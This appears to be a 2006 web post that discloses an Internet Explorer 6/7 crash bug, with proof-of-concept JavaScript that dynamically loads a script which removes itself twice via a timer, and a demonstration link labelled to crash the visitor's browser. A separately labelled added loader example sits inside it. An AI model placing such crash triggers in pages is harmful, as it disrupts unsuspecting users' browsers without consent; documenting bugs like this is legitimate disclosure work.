
Internet Explorer 6&7 Bug/Crash

Author: Wojjie     Posted: 2006-10-30     Viewed: 17,563

Introduction:

I found this bug when I was developing a new site, and was testing using DOM to create new script elements dynamically. The code works without crashing in all browsers I have tried, except for Internet Explorer. I have tried this in both 6 and 7 with the same end result (though Internet Explorer 6's crash is much more nasty).

Bug/Exploit:

It appears there is a problem when a script is dynamically loaded and calls a function to remove itself from the page multiple times. It appears that this sequence of events has to be run twice for it to happen, and a timer must be used to call the start of the second run (very weird).

Here is the code I have finally come up with and is demonstrated later on this page:

<script type="text/javascript">
var ranonce=false;
function c() {
 var r=document.createElement('script');
 r.id='test';
 r.setAttribute('type','text/javascript');
 r.setAttribute('src','crash.js');
 var hd=document.getElementsByTagName('head')[0];
 hd.appendChild(r);
}
function c3() {
 var hd=document.getElementsByTagName('head')[0];
 hd.removeChild(document.getElementById('test'));
 if (ranonce==false) {
   ranonce=true;
   setTimeout('c()',50);
 } else {
   var a=document.getElementById('browser');
   a.innerHTML='You are using a non IE browser or the bug has been patched!';
   a.href='#';
 }
}
</script>
<a href="javascript: c();" id="browser">
	Click here to crash your IE browser
</a>

Contents of 'crash.js'

	c3();

To trigger this application, you must make a call to the c() function, which should immediately crash IE.
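
A loader that avoids the condition described above, where a dynamically loaded script removes its own element while its code is still running: here the page removes the element, one timer tick after the script reports completion. This is an added example, not code from the original article; `loadScript`, `widget.js` and the `defer` parameter are hypothetical names, and it has not been tested against the crash on IE 6 or 7.

```javascript
// Added example (hypothetical names): the loaded file never touches its own
// <script> element; the loader removes it after execution has finished.
// `doc` is any object with the DOM methods used here (pass `document` in a browser).
// `defer` is an optional scheduler, injectable so the logic can be tested.
function loadScript(doc, src, onDone, defer) {
  var head = doc.getElementsByTagName('head')[0];
  var el = doc.createElement('script');
  var finished = false;
  defer = defer || function (fn) { setTimeout(fn, 0); };

  function cleanup() {
    if (finished) { return; }            // both completion events may fire
    finished = true;
    el.onload = el.onreadystatechange = null;
    // Remove on a later tick so no code from `src` is still on the call stack.
    defer(function () {
      if (el.parentNode === head) { head.removeChild(el); }
      if (typeof onDone === 'function') { onDone(src); }
    });
  }

  el.setAttribute('type', 'text/javascript');
  el.setAttribute('src', src);
  el.onload = cleanup;                    // standards browsers
  el.onreadystatechange = function () {   // old IE signals completion here
    if (el.readyState === 'loaded' || el.readyState === 'complete') { cleanup(); }
  };
  head.appendChild(el);
  return el;
}

// Browser usage: load the same file twice in sequence, as the page's
// test does, but with removal handled by the loader each time.
// loadScript(document, 'widget.js', function () {
//   loadScript(document, 'widget.js');
// });
```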


Reproduction Attempts:

I have also tried variations of this code which seemed to have not worked the same way:

Please note that the above example code is lengthier than it has to be, and that an anchor is not required to execute the crash.


Demonstration/Example:

Click here to crash your IE browser
